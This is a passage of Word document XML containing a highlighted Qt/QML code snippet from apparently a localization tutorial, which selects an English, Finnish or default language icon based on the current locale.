          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shows how you could select an appropriate icon that represents the language of the current locale.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</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onCompleted</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p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00B90C6B"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B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>switch</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>locale</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>substring</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00B90C6B"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B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>case</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"en"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// show the English-language icon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00B90C6B"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B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            languageIcon </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"../images/language-icon_en.png"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00B90C6B"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B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00B90C6B"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B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>case</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"fi"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// show the Finnish language icon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00B90C6B"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B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            languageIcon </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"../images/language-icon_fi.png"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00B90C6B"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B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00B90C6B"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B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// show a default language icon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00B90C6B"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B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            languageIcon </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"../images/language-icon_default.png"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00B90C6B" w:rsidRDefault="005211D0" w:rsidP="005211D0">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B90C6B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00B90C6B" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90C6B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
